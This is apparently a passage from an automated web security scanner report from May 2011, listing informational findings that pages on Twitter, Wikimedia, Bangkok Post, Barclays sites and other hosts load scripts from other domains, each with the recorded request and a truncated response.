Set-Cookie: guest_id=130442926938325767; path=/; expires=Thu, 02 Jun 2011 13:27:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIkRC7YvAToHaWQiJWUzODUxZmM5N2FkMGYy%250ANWU2OTc4YmFmZmUwYzAwZjMzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e6495d6a809198515566fe70a30332990466c813; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/twitter.js?1304355815" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1304118205/javascripts/lib/jquery.tipsy.min.js?1303492997" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1304118205/javascripts/lib/gears_init.js?1303492997" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/lib/mustache.js?1303492997" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/geov1.js?1303492996" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1304118205/javascripts/api.js?1303492996" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/lib/mustache.js?1303492997" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/dismissable.js?1303492996" type="text/javascript"></script>
...[SNIP]...

23.51. http://twitter.com/scb_thailand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /scb_thailand

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /scb_thailand HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:54 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304429274-73578-48757
ETag: "93bfce0d2f5b4a39cb77e73211eaca85"
Last-Modified: Tue, 03 May 2011 13:27:54 GMT
X-Runtime: 0.00777
Content-Type: text/html; charset=utf-8
Content-Length: 52433
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1304429274280425; path=/; expires=Tue, 10-May-11 13:27:54 GMT; domain=.twitter.com
Set-Cookie: guest_id=130442927428828772; path=/; expires=Thu, 02 Jun 2011 13:27:54 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLEkC7YvAToHaWQiJTEzY2I3OGVjNDZiNWM0%250AZGQ4NmVhNzFjZDY3ZGU4MDcxIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b99283e2490d1e5e9ee960699bef94c5d581e3f7; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/twitter.js?1304355815" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1304118205/javascripts/lib/jquery.tipsy.min.js?1303492997" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1304118205/javascripts/lib/gears_init.js?1303492997" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/lib/mustache.js?1303492997" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/geov1.js?1303492996" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1304118205/javascripts/api.js?1303492996" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/lib/mustache.js?1303492997" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1304118205/javascripts/dismissable.js?1303492996" type="text/javascript"></script>
...[SNIP]...

23.52. http://webcache.googleusercontent.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search?q=cache:_Is84meKSVgJ:https://www.barclaycardus.com/+barkley+bank&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com HTTP/1.1
Host: webcache.googleusercontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Tue, 03 May 2011 13:28:10 GMT
Expires: -1
Cache-Control: private, max-age=0
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<base href="https://www.barclaycardus.com/"><div style="margin:-1px -1px 0;padding:0;border:1px solid #999;background:#fff"><div sty
...[SNIP]...
<head>

<script src="https://www.barclaycardus.com/app/ccsite/flashElements/js/swfobject_modified-min.js" type="text/javascript"></script>
<script src="https://www.barclaycardus.com/app/ccsite/flashElements/js/AC_RunActiveContent-min.js" type="text/javascript"></script>
...[SNIP]...
</a>
                       <script src="https://www.barclaycardus.com/app/ccsite/js/function_passmark-min.js" language="JavaScript" type="text/javascript"></script>
...[SNIP]...

23.53. http://wiki.answers.com/Q/Who_is_Director_of_Barkley_Bank_London  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/Who_is_Director_of_Barkley_Bank_London

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Q/Who_is_Director_of_Barkley_Bank_London HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 03 May 2011 13:29:08 GMT
X-Varnish: 1509835285 1507595749
Age: 23086
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 71881


                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:f
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico?v=82654" />

<script src="http://en.site1.answcdn.com/templates/scripts/~XcdekjfgilsryaNOxlxtydSnHoGLWxj.js?v=82654" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
   <script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
   </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

23.54. http://wikimediafoundation.org/wiki/Privacy_policy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Privacy_policy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/Privacy_policy HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 12:57:47 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Sun, 13 Mar 2011 02:42:09 GMT
Content-Length: 44714
Content-Type: text/html; charset=UTF-8
Age: 1882
X-Cache: HIT from sq63.wikimedia.org
X-Cache-Lookup: HIT from sq63.wikimedia.org:3128
X-Cache: MISS from sq37.wikimedia.org
X-Cache-Lookup: MISS from sq37.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
...[SNIP]...
<!-- /footer -->
       
<script src="http://bits.wikimedia.org/wikimediafoundation.org/load.php?debug=false&amp;lang=en&amp;modules=startup&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://bits.wikimedia.org/wikimediafoundation.org/load.php?debug=false&amp;lang=en&amp;modules=site&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...

23.55. http://wikimediafoundation.org/wiki/Terms_of_Use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /wiki/Terms_of_Use

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/Terms_of_Use HTTP/1.1
Host: wikimediafoundation.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 12:57:47 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: en
Vary: Accept-Encoding,Cookie
Last-Modified: Thu, 28 Apr 2011 22:21:58 GMT
Content-Length: 27666
Content-Type: text/html; charset=UTF-8
Age: 1881
X-Cache: HIT from sq77.wikimedia.org
X-Cache-Lookup: HIT from sq77.wikimedia.org:3128
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: MISS from sq76.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
...[SNIP]...
<!-- /footer -->
       
<script src="http://bits.wikimedia.org/wikimediafoundation.org/load.php?debug=false&amp;lang=en&amp;modules=startup&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://bits.wikimedia.org/wikimediafoundation.org/load.php?debug=false&amp;lang=en&amp;modules=site&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...

23.56. http://wuu.wikipedia.org/wiki/ćł°ĺ?˝é?¶čˇ?  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wuu.wikipedia.org
Path:   /wiki/............

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiki/............ HTTP/1.1
Host: wuu.wikipedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:23:30 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
Content-Language: wuu
Vary: Accept-Encoding,Cookie
Last-Modified: Fri, 19 Nov 2010 03:13:43 GMT
Content-Length: 30820
Content-Type: text/html; charset=UTF-8
Age: 340
X-Cache: HIT from sq72.wikimedia.org
X-Cache-Lookup: HIT from sq72.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:80
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="wuu" dir="ltr" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title
...[SNIP]...
<!-- /footer -->
       
<script src="http://bits.wikimedia.org/wuu.wikipedia.org/load.php?debug=false&amp;lang=wuu&amp;modules=startup&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://bits.wikimedia.org/wuu.wikipedia.org/load.php?debug=false&amp;lang=wuu&amp;modules=site&amp;only=scripts&amp;skin=vector" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://geoiplookup.wikimedia.org/"></script>
...[SNIP]...

23.57. http://www.360travelguide.com/results.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.360travelguide.com
Path:   /results.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /results.asp HTTP/1.1
Host: www.360travelguide.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 May 2011 13:34:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.360travelguide.com/
Content-Length: 26243
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCDCCARR=GAOGAIKDCKOEGMKGKMCIFMLI; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<met
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid='conradf'"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</form>

<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>

<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script>
...[SNIP]...
<!-- Google Analytics -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

23.58. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-En HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 443
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTTCQT=PFGICGIDJBLAOOFHIKHEOBNN; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:51 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])

<script language='javascript1.1'>
   page='Home-En';
</script>
<script language='javascript1.1' src='http://hits.truehits.in.th/data/k0019767.js'> </script>
<NOSCRIPT>
<a target="_blank" href="
...[SNIP]...

23.59. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/company-in-thailand/financial/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZXIzOXNwNnYyMWNwZTN1a3FmOTBlcGVhaDciO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=m7p0jcnu52i8b59ffdpsdscrf7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
</script>
       <script type="text/javascript" src="http://hits.truehits.in.th/data/s0028944.js"></script>
...[SNIP]...

23.60. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/company-in-thailand/financial/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiNDFlYTd0aDc4OTMwNzNxbHFoNzYwcXA5cDUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=sp10k0fkgufd7cerlthgse6p52; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...
</script>
       <script type="text/javascript" src="http://hits.truehits.in.th/data/s0028944.js"></script>
...[SNIP]...

23.61. http://www.bangkokpost.com/forum/viewtopic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewtopic.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forum/viewtopic.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_forum_u=1; expires=Wed, 02-May-2012 13:38:08 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_k=; expires=Wed, 02-May-2012 13:38:08 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_sid=b7f53d5b40c5dd063ef80eb8ba78634c; expires=Wed, 02-May-2012 13:38:08 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiajNtZGs0NXE4N2ZsZm4zcGM4dW9yYmRqOTUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
</SCRIPT>
<SCRIPT LANGUAGE="javascript1.1" src="http://hits.truehits.in.th/data/s0028944.js"></SCRIPT>
...[SNIP]...

23.62. https://www.barclays-home-insurance.co.uk/p4/Barclays/Home/Assumptions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.barclays-home-insurance.co.uk
Path:   /p4/Barclays/Home/Assumptions.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /p4/Barclays/Home/Assumptions.aspx HTTP/1.1
Host: www.barclays-home-insurance.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html; charset=utf-8
date: Tue, 03 May 2011 12:53:24 GMT
cache-control: private
x-powered-by: ASP.NET
x-aspnet-version: 2.0.50727
server: Microsoft-IIS/7.0
connection: close
x-old-content-length: 51727
Set-Cookie: ASP.NET_SessionId=mgn2cmy0yflvep55gnwr1g45; Path=/p4/; Secure


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" dir="ltr" lang=
...[SNIP]...
<!-- Advertiser 'Barclays Bank PLC c/o Walker Media', Include user in conversion 'Barclays Home Insurance Start Quote Retargeting Pixel' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->

<script src="https://ad.yieldmanager.com/pixel?id=592617&t=1" type="text/javascript"></script>
...[SNIP]...

23.63. http://www.barclaysannualreports.com/ar2010/index.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclaysannualreports.com
Path:   /ar2010/index.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ar2010/index.asp HTTP/1.1
Host: www.barclaysannualreports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:35:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 44625
Content-Type: text/html; Charset=utf-8
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-GB" xml:lang="en-GB">
<head>
   <!-
...[SNIP]...
</div>

<script src="http://scripts.the-group.net/aether/aether.js" type="text/javascript"></script>
...[SNIP]...

23.64. http://www.bot.or.th/english/Pages/BOTDefault.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bot.or.th
Path:   /english/Pages/BOTDefault.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /english/Pages/BOTDefault.aspx HTTP/1.1
Host: www.bot.or.th
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 53144
Content-Type: text/html; charset=utf-8
Expires: Mon, 18 Apr 2011 11:44:01 GMT
Last-Modified: Tue, 03 May 2011 11:44:01 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 03 May 2011 11:44:02 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html __expr-val-dir="ltr" dir="ltr">
<head><link href="../../Style%20Library/en-us/zz1_BOTMa
...[SNIP]...
</script>
                        <script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002215.js"></script>
...[SNIP]...

23.65. http://www.coolthaihouse.com/forum/viewtopic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolthaihouse.com
Path:   /forum/viewtopic.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forum/viewtopic.php HTTP/1.1
Host: www.coolthaihouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:37:27 GMT
Server: Apache/2.2.9 (Linux/SUSE)
Set-Cookie: phpbb3_8p4br_u=1; expires=Wed, 02-May-2012 13:37:27 GMT; path=/; domain=.coolthaihouse.com; HttpOnly
Set-Cookie: phpbb3_8p4br_k=; expires=Wed, 02-May-2012 13:37:27 GMT; path=/; domain=.coolthaihouse.com; HttpOnly
Set-Cookie: phpbb3_8p4br_sid=a1740a6cf42ebd62b46b0b81ec8d9ee6; expires=Wed, 02-May-2012 13:37:27 GMT; path=/; domain=.coolthaihouse.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...
</script>
                           <script type="text/javascript"
                            src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

                           </script>
...[SNIP]...
</script>
       <script type="text/javascript"
        src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

       </script>
...[SNIP]...

23.66. http://www.facebook.com/pages/KTB-Care/178373518915  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/KTB-Care/178373518915

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pages/KTB-Care/178373518915 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=z8-YA; path=/; domain=.facebook.com
